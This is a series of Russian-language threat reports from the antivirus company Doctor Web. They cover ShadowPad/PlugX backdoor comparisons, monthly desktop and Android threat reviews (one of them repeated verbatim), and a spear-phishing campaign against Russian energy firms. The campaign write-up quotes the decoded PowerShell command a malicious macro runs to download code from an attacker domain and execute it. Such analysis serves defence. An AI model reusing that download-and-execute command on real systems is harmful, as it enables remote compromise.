BackDoor.Farfli.122 BackDoor.Farfli.125 |
www[.]pneword[.]net | 03.11.2017 09:06:07.646 |
| 3ff98ed63e3612e56be10e0c22b26fc1069f85852ea1c0b306e4c6a8447c546a (DLL-загрузчик) b8a13c2a4e09e04487309ef10e4a8825d08e2cd4112846b3ebda17e013c97339 (основной модуль) |
BackDoor.PlugX.47 BackDoor.PlugX.48 |
www[.]mongolv[.]com | 29.12.2016 14:57:00.526 |
| 32e95d80f96dae768a82305be974202f1ac8fcbcb985e3543f29797396454bd1 (DLL-загрузчик) b8a13c2a4e09e04487309ef10e4a8825d08e2cd4112846b3ebda17e013c97339 (основной модуль) |
BackDoor.PlugX.47 BackDoor.PlugX.48 |
www[.]arestc[.]net | 23.03.2018 13:06:01.444 |
| b8a13c2a4e09e04487309ef10e4a8825d08e2cd4112846b3ebda17e013c97339 (основной модуль) | BackDoor.PlugX.48 | www[.]icefirebest[.]com | 03.12.2018 14:12:24.111 |
Для дальнейшего исследования мы нашли и проанализировали другие образцы семейства ShadowPad, чтобы более детально рассмотреть сходство бэкдоров семейств ShadowPad и PlugX:
Подробное исследование образцов ShadowPad и их сравнение с ранее изученными нами модификациями PlugX указывает на высокую схожесть принципов действия и модульных структур бэкдоров обоих семейств. Эти вредоносные программы сближает не только общая концепция, но и нюансы кода: некоторые приемы разработки, идеи и технические решения практически копируют друг друга. Немаловажным фактом является и то, что оба бэкдора находились в скомпрометированной сети государственного учреждения Киргизии.
Подробные технические описания обнаруженных вредоносных программ находятся в PDF-версии исследования и в вирусной библиотеке Dr.Web.
Имеющиеся данные позволяют нам сделать вывод о связи этих семейств, при этом возможны как простое заимствование кода, так и разработка обеих программ одним автором или группой авторов. Во втором случае весьма вероятной видится эволюция PlugX в более новый и совершенный ShadowPad, так как формат хранения вредоносных модулей, применяемый в последнем, многократно затрудняет возможность их обнаружения в оперативной памяти.
|
|
«Доктор Веб»: обзор вирусной активности в сентябре 2020 года |
22 октября 2020 года
В сентябре анализ данных статистики Dr.Web показал увеличение общего числа обнаруженных угроз — на 13.88% по сравнению с августом. Количество уникальных вредоносных программ также выросло — на 19.17%. Большинство выявленных угроз по-прежнему приходится на долю рекламных программ, а также троянских загрузчиков вредоносного ПО. В почтовом трафике среди самых распространенных угроз вновь оказался опасный банковский троян Trojan.SpyBot.699. Кроме того, пользователям продолжают угрожать различные модификации вредоносных HTML-документов, распространяемых в виде вложений и перенаправляющих пользователей на фишинговые сайты.
В сентябре количество обращений пользователей за расшифровкой файлов осталось на августовском уровне. Самым распространенным энкодером остается Trojan.Encoder.26996, на долю которого приходится 35.71% всех инцидентов.
Угрозы прошедшего месяца:
По сравнению с августом в сентябре в антивирусную лабораторию «Доктор Веб» поступило на 0.45% меньше запросов на расшифровку файлов от пользователей, пострадавших от шифровальщиков.
В течение сентября 2020 года в базу нерекомендуемых и вредоносных сайтов было добавлено 152 270 интернет-адресов.
| Август 2020 | Сентябрь 2020 | Динамика |
|---|---|---|
| + 174 501 | + 152 270 | - 12.74% |
В сентябре на Android-устройствах было выявлено на 3.75% больше угроз, чем в августе. При этом в каталоге Google Play вновь распространялись всевозможные троянские программы. В их числе оказались представители семейства Android.Joker, способные выполнять произвольный код и подписывать жертв на дорогостоящие мобильные услуги. Другой угрозой стал опасный многофункциональный троян Android.Triada.545.origin, который также мог выполнять произвольный код и похищал конфиденциальную информацию. Кроме того, вирусные аналитики компании «Доктор Веб» выявили очередного трояна-кликера, получившего имя Android.Click.978. Он показывал рекламу, а также загружал различные веб-сайты и переходил по находившимся на них ссылкам и баннерам.
Наиболее заметные события, связанные с «мобильной» безопасностью в сентябре:
Более подробно о вирусной обстановке для мобильных устройств в сентябре читайте в нашем обзоре.
|
|
«Доктор Веб»: обзор вирусной активности для мобильных устройств в сентябре 2020 года |
22 октября 2020 года
Согласно статистике детектирований антивирусных продуктов Dr.Web для Android, в сентябре на защищаемых устройствах было зафиксировано на 3.75% больше угроз, чем в августе. По сравнению с прошлым месяцем количество обнаруженных вредоносных программ увеличилось на 5.58%, а потенциально опасных - на 4.98%. При этом число рекламных и нежелательных приложений сократилось на 6.22% и 8.83% соответственно.
В течение сентября вирусные аналитики «Доктор Веб» выявили в каталоге Google Play несколько новых вредоносных приложений. Среди них оказались представители опасного семейства троянов Android.Joker, способных выполнять произвольный код и подписывать жертв на платные сервисы. Кроме того, злоумышленники распространяли трояна-кликера Android.Click.978, показывавшего рекламу, а также многофункционального трояна Android.Triada.545.origin, который использовался в том числе для фишинга.
Программные модули, встраиваемые в Android-приложения и предназначенные для показа навязчивой рекламы на мобильных устройствах. В зависимости от семейства и модификации они могут демонстрировать рекламу в полноэкранном режиме, блокируя окна других приложений, выводить различные уведомления, создавать ярлыки и загружать веб-сайты.
В сентябре в каталоге Google Play было обнаружено несколько новых модификаций троянов семейства Android.Joker, один из которых распространялся под видом графического редактора и получил имя Android.Joker.341. Как и другие представители семейства, эта вредоносная программа загружала и исполняла произвольный код, а также могла подписывать пользователей на платные услуги, получая коды подтверждений из поступающих уведомлений.
В зависимости от архитектуры процессора, используемой на зараженном устройстве, при старте троян загружает в память одну из скрытых в его apk-файле нативных библиотек (антивирус Dr.Web детектирует их как Android.Joker.339 и Android.Joker.340).
В свою очередь, загруженная библиотека извлекает из себя вредоносный модуль Android.Joker.177.origin, который скачивает с удаленного сервера модуль Android.Joker.192.origin. Тот получает доступ к содержимому уведомлений и загружает с сервера еще один модуль - Android.Joker.107.origin. В нем содержится основная вредоносная функциональность.
Позднее вирусные аналитики «Доктор Веб» обнаружили аналогичного трояна, которого злоумышленники распространяли под видом сборника изображений. Он был добавлен в вирусную базу Dr.Web как Android.Joker.344.
Другой угрозой оказался многофункциональный троян Android.Triada.545.origin, принадлежащий семейству опасных вредоносных программ Android.Triada. Он скрывался в приложении-фотокамере.
Одной из функций Android.Triada.545.origin является фишинг. При запуске троян демонстрирует поддельное окно авторизации в сервисах Google. В нем жертвам предлагается ввести информацию для доступа к их учетной записи - якобы чтобы продолжить использовать приложение. Чтобы еще больше сбить пользователей с толку, в окне также говорится о возможности принять участие в розыгрыше нового телефона после входа в учетную запись. Однако все это - лишь уловка, и вводимые данные передаются злоумышленникам.
Кроме того, Android.Triada.545.origin может загружать и выполнять произвольный код, а также перехватывать уведомления и похищать из них информацию - например, пин-коды.
Еще одной Android-угрозой, обнаруженной в Google Play в сентябре, стал троян-кликер Android.Click.978, распространявшийся под видом приложения с предсказаниями. После запуска он скрывал свой значок из списка приложений в меню главного экрана устройства и начинал показывать рекламу, которая демонстрировалась даже после закрытия Android.Click.978. Троян также загружал веб-сайты и автоматически нажимал на расположенные на них ссылки и баннеры.
Для защиты Android-устройств от вредоносных и нежелательных программ пользователям следует установить антивирусные продукты Dr.Web для Android.
|
|
Целевые шпионские спам-кампании угрожают предприятиям ТЭК РФ |
23 сентября 2020 года
В конце апреля 2020 года вирусные аналитики компании «Доктор Веб» зафиксировали спам-кампанию, в ходе которой сотрудникам ряда предприятий топливно-энергетического комплекса России под видом обновленного телефонного справочника рассылались документы с расширением .docx, которые загружали два изображения с удаленных ресурсов.
Одно из них загружалось на пользовательский компьютер с сервера news[.]zannews[.]com. Примечательно, что доменное имя схоже с доменом антикоррупционного медиацентра Казахстана — zannews[.]kz. С другой стороны, используемый домен сразу напомнил о другой известной кампании 2015 года, известной как TOPNEWS, в которой использовался бэкдор ICEFOG, а домены управления троянами имели подстроку «news» в названиях. Другой интересной особенностью стало то, что при отправке писем различным адресатам в запросах на загрузку изображения использовались разные параметры запроса или же уникальные имена изображений. Мы считаем, что это было сделано с целью сбора информации для определения «надежного» адресата, который в последующем гарантированно откроет письмо. Для загрузки изображения со второго сервера использовался протокол SMB, что могло быть сделано для сбора NetNTLM-хешей с компьютеров сотрудников, открывших полученный документ.
В июне этого года злоумышленники начали использовать новое доменное имя — sports[.]manhajnews[.]com. Как показал анализ, субдомены manhajnews[.]com использовались в спам-рассылках как минимум с сентября 2019 года. Так, одной из целей в рамках этой кампании оказался крупный российский университет.
Кроме того, в июне была запущена очередная кампания: на этот раз документ содержал информацию об отраслевом развитии. Текст письма явно указывал на то, что его автор не является носителем русского языка. При этом сервер для загрузки изображений был изменен на download[.]inklingpaper[.]com
В качестве попытки обойти детектирование вредоносных документов антивирусными программами в июле злоумышленники стали использовать документы Microsoft Word, зашифрованные при помощи пароля. Одновременно с этим само содержание письма было незначительно изменено:
Текст обращения вновь был написан в прежнем стиле, чем вызывал дополнительные подозрения у адресата. Сервер для скачивания картинки также не менялся.
Отметим, что во всех случаях для рассылки писем использовались электронные почтовые ящики, зарегистрированные на доменах mail[.]ru и yandex[.]ru.
В начале сентября 2020 года вирусные аналитики зафиксировали новую спам-кампанию, в рамках которой злоумышленники вновь рассылали письма под предлогом обновления телефонного справочника. Однако на этот раз вложение содержало вредоносный макрос.
При открытии приложенного документа макрос создавал два файла: VBS-скрипт
Суть его работы сводится к запуску оболочки Powershell с определенными параметрами. Параметры, передаваемые оболочке, декодируются в следующие команды:
$o = [activator]::CreateInstance([type]::GetTypeFromCLSID("F5078F35-C551-11D3-89B9-0000F81FE221"));$o.Open("GET", "http://newsinfo.newss.nl/nissenlist/johnlists.html", $False);$o.Send(); IEX $o.responseText;
Как следует из представленных команд, домен, с которого загружается полезная нагрузка, вновь замаскирован под новостной сайт. На заражаемый компьютер доставляется простой загрузчик, единственной задачей которого является получение шелл-кода от управляющего сервера и его выполнение. Специалистам компании «Доктор Веб» удалось выявить два вида бэкдоров, которые могут быть установлены на ПК жертвы.
Первый из них — BackDoor.Siggen2.3238 — ранее не встречался нашим специалистам, при этом какие-либо упоминания этой программы другими антивирусными вендорами также не нашлись. Второй является модификацией уже известного нам по инциденту с государственным учреждением Казахстана бэкдора BackDoor.Whitebird. Кроме того, в ходе исследования мы обнаружили еще один домен, который использовался в ходе этой кампании, — news[.]microotf[.]com. Однако мы не нашли ни одной троянской программы, которая использовала бы этот домен в качестве управляющего сервера.
Анализ документов, вредоносных программ, а также использованной инфраструктуры позволяет нам с уверенностью сказать, что атака была подготовлена одной из китайских APT-групп. Учитывая функциональность бэкдоров, которые устанавливаются на компьютеры жертв в случае успешной атаки, заражение ведет как минимум к краже конфиденциальной информации с компьютеров атакованных организаций. Кроме того, весьма вероятным сценарием является установка специализированных троянов на локальные серверы с особой функцией, такие как контроллеры домена, почтовые серверы, интернет-шлюзы и т. п. Как мы могли наблюдать на примере инцидента в Казахстане, такие серверы по различным причинам представляют особый интерес для злоумышленников.
Специалисты вирусной лаборатории «Доктор Веб» обращают внимание пользователей на необходимость внимательно относиться ко всей входящей корреспонденции, включая письма, полученные от якобы известных адресантов.
Вложение, содержащее вредоносный макрос, было успешно обнаружено облачным анализатором Dr.Web vxCube.
Подробные технические описания обнаруженных вредоносных программ находятся в вирусной библиотеке Dr.Web.
|
|
«Доктор Веб»: обзор вирусной активности для мобильных устройств в августе 2020 года |
16 сентября 2020 года
В августе на Android-устройствах было выявлено на 2,21% больше угроз, чем в июле. Количество вредоносных программ при этом увеличилось на 6,26%, в то время как число нежелательных приложений сократилось на 0,49%, потенциально опасных — на 13,82%, а рекламных — на 10,1%.
Специалисты компании «Доктор Веб» обнаружили в каталоге Google Play очередные угрозы. В их числе – различные модификации троянских приложений семейства Android.FakeApp, которые распространялись под видом программ-справочников и загружали мошеннические сайты. Кроме того, был найден новый представитель семейства многофункциональных троянов Android.Joker, подписывающий пользователей на платные услуги и способный загружать и исполнять произвольный код.
Программные модули, встраиваемые в Android-приложения и предназначенные для показа навязчивой рекламы на мобильных устройствах. В зависимости от семейства и модификации они могут демонстрировать рекламу в полноэкранном режиме, блокируя окна других приложений, выводить различные уведомления, создавать ярлыки и загружать веб-сайты.
В августе вирусные аналитики компании «Доктор Веб» обнаружили в каталоге Google Play сразу несколько новых вредоносных программ семейства Android.FakeApp, получивших имена Android.FakeApp.199, Android.FakeApp.200, Android.FakeApp.202 и Android.FakeApp.203. Они распространялись под видом справочников с информацией о получении социальных выплат и возврате НДС.
При запуске эти трояны загружают мошеннический сайт несуществующей организации «Единый Компенсационный Центр Возврата Налога Добавленной Стоимости», где потенциальным жертвам предлагается указать персональные данные якобы для проверки доступности той или иной денежной компенсации. После ввода информации на сайте имитируется процесс поиска, и пользователи видят ложное сообщение об успешно найденных для них вариантах возврата денег.
Затем чат-бот сайта имитирует диалог со специалистом. Он предлагает заполнить мнимую анкету, указав в веб-форме дополнительную конфиденциальную информацию, а также оплатить пошлину или комиссию за оформление документов и денежный перевод.
В результате такого мошенничества обманутые пользователи не только передают злоумышленникам личные данные, но и добровольно переводят им собственные деньги, не получая при этом никаких обещанных выплат.
Другой угрозой, найденной в Google Play, стал очередной представитель семейства опасных троянов Android.Joker, получивший имя Android.Joker.304. Он распространялся под видом приложения-переводчика. Как и другие трояны этого семейства, Android.Joker.304 мог подписывать пользователей на дорогостоящие мобильные услуги, а также загружать и выполнять произвольный код.
Для защиты Android-устройств от вредоносных и нежелательных программ пользователям следует установить антивирусные продукты Dr.Web для Android.
|
|
«Доктор Веб»: обзор вирусной активности для мобильных устройств в августе 2020 года |
16 сентября 2020 года
В августе на Android-устройствах было выявлено на 2,21% больше угроз, чем в июле. Количество вредоносных программ при этом увеличилось на 6,26%, в то время как число нежелательных приложений сократилось на 0,49%, потенциально опасных — на 13,82%, а рекламных — на 10,1%.
Специалисты компании «Доктор Веб» обнаружили в каталоге Google Play очередные угрозы. В их числе – различные модификации троянских приложений семейства Android.FakeApp, которые распространялись под видом программ-справочников и загружали мошеннические сайты. Кроме того, был найден новый представитель семейства многофункциональных троянов Android.Joker, подписывающий пользователей на платные услуги и способный загружать и исполнять произвольный код.
Программные модули, встраиваемые в Android-приложения и предназначенные для показа навязчивой рекламы на мобильных устройствах. В зависимости от семейства и модификации они могут демонстрировать рекламу в полноэкранном режиме, блокируя окна других приложений, выводить различные уведомления, создавать ярлыки и загружать веб-сайты.
В августе вирусные аналитики компании «Доктор Веб» обнаружили в каталоге Google Play сразу несколько новых вредоносных программ семейства Android.FakeApp, получивших имена Android.FakeApp.199, Android.FakeApp.200, Android.FakeApp.202 и Android.FakeApp.203. Они распространялись под видом справочников с информацией о получении социальных выплат и возврате НДС.
При запуске эти трояны загружают мошеннический сайт несуществующей организации «Единый Компенсационный Центр Возврата Налога Добавленной Стоимости», где потенциальным жертвам предлагается указать персональные данные якобы для проверки доступности той или иной денежной компенсации. После ввода информации на сайте имитируется процесс поиска, и пользователи видят ложное сообщение об успешно найденных для них вариантах возврата денег.
Затем чат-бот сайта имитирует диалог со специалистом. Он предлагает заполнить мнимую анкету, указав в веб-форме дополнительную конфиденциальную информацию, а также оплатить пошлину или комиссию за оформление документов и денежный перевод.
В результате такого мошенничества обманутые пользователи не только передают злоумышленникам личные данные, но и добровольно переводят им собственные деньги, не получая при этом никаких обещанных выплат.
Другой угрозой, найденной в Google Play, стал очередной представитель семейства опасных троянов Android.Joker, получивший имя Android.Joker.304. Он распространялся под видом приложения-переводчика. Как и другие трояны этого семейства, Android.Joker.304 мог подписывать пользователей на дорогостоящие мобильные услуги, а также загружать и выполнять произвольный код.
Для защиты Android-устройств от вредоносных и нежелательных программ пользователям следует установить антивирусные продукты Dr.Web для Android.
|
|